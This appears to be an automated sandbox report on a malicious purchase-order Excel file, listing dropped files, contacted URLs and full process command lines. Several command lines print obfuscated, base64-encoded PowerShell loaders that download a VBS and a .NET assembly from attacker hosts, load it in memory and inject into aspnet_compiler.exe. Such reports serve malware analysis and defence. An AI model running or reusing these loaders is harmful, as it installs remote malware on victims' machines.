Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
PO#BBGR2411PO69.xls
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Dec 2 02:20:48 2024, Security: 1
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestthingsgivenmegood[1].hta
|
HTML document, ASCII text, with very long lines (65536), with no line terminators
|
modified
|
|
|
|
C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS
|
Unicode text, UTF-16, little-endian text, with very long lines (3453), with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\Desktop\PO#BBGR2411PO69.xls (copy)
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Dec 2 06:24:53 2024, Security: 1
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\seethebestmagicalthignsgivegoodforu[1].tiff
|
Unicode text, UTF-16, little-endian text, with very long lines (3453), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\19F2129E.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2DCF6843.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6428785C.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9623E607.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F6FEC4AD.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\RES1610.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Dec 2 06:25:06 2024,
1st section name ".debug$S"
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\RESC5BF.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Dec 2 06:24:46 2024,
1st section name ".debug$S"
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\abgkk4xv.hlh.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\cc1tntjh.vr4.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\drzpuovq.4tc.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\g1iqzbhj.po2.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\gbyc5wn5.4s2.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\hwm1ljy5.scq.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\n44dq5mh.ppg.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\r3q12jmu\CSC7CCBE632744241EDA0AD204CE9F5FD7D.TMP
|
MSVC .res
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (348)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\xmqw35tj\CSCD4982987C63C4803AF625DBF77F42E41.TMP
|
MSVC .res
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (348)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\zh1bgx2j.xut.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DF47D597805C4E33C7.TMP
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DF77F41D790A6A1D9F.TMP
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DFC9817EE2022F4CEE.TMP
|
data
|
dropped
|
||
|
C:\Users\user\Desktop\09230000
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Dec 2 06:24:53 2024, Security: 1
|
dropped
|
||
|
C:\Users\user\Desktop\09230000:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 27 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
|
|
|
|
C:\Windows\System32\mshta.exe
|
C:\Windows\System32\mshta.exe -Embedding
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs
-nOP -W 1 -C
DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
pOWeRsHElL -EX bypaSs -nOP
-W 1 -C DEVICEcReDenTialDePlOYMeNt
; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline"
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda
= [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
|
|
|
|
C:\Windows\System32\mshta.exe
|
C:\Windows\System32\mshta.exe -Embedding
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs
-nOP -W 1 -C
DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
pOWeRsHElL -EX bypaSs -nOP
-W 1 -C DEVICEcReDenTialDePlOYMeNt
; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.cmdline"
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda
= [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC5BF.tmp"
"c:\Users\user\AppData\Local\Temp\r3q12jmu\CSC7CCBE632744241EDA0AD204CE9F5FD7D.TMP"
|
||
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1610.tmp"
"c:\Users\user\AppData\Local\Temp\xmqw35tj\CSCD4982987C63C4803AF625DBF77F42E41.TMP"
|
There are 7 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta
|
146.70.113.200
|
|
|
|
http://146.70.113.200/231/seethebestmagicalthignsgivegoodforu.tIF
|
146.70.113.200
|
|
|
|
http://146.70.113.200/231/ZAHHRZA.txt
|
146.70.113.200
|
|
|
|
https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c
|
142.215.209.77
|
|
|
|
http://146.70.113.200/231/seethebestmagicalthignsgivegoodforu.tIFp
|
unknown
|
||
|
http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaght=delicious&middl
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://146.70.113.200/231/seethe
|
unknown
|
||
|
http://crl.entrust.net/server1.crl0
|
unknown
|
||
|
https://linkjago.me/S
|
unknown
|
||
|
http://146.70.113.200/
|
unknown
|
||
|
http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaghlig
|
unknown
|
||
|
http://ocsp.entrust.net03
|
unknown
|
||
|
http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaJ
|
unknown
|
||
|
http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaes
|
unknown
|
||
|
http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta...
|
unknown
|
||
|
http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaghligM
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta...893F-F
|
unknown
|
||
|
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
|
unknown
|
||
|
https://1016.filemail.com
|
unknown
|
||
|
http://www.diginotar.nl/cps/pkioverheid0
|
unknown
|
||
|
http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta$
|
unknown
|
||
|
http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaX
|
unknown
|
||
|
http://go.micros
|
unknown
|
||
|
http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaghlight=delicious&middleman=magenta&span
|
unknown
|
||
|
https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5T
|
unknown
|
||
|
http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htahttp://146.70.113.200/231/dnv/seemebestt
|
unknown
|
||
|
https://linkjago.me/v
|
unknown
|
||
|
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
|
unknown
|
||
|
https://linkjago.me/r
|
unknown
|
||
|
http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaC:
|
unknown
|
||
|
https://linkjago.me/
|
unknown
|
||
|
http://146.70.113.200//
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
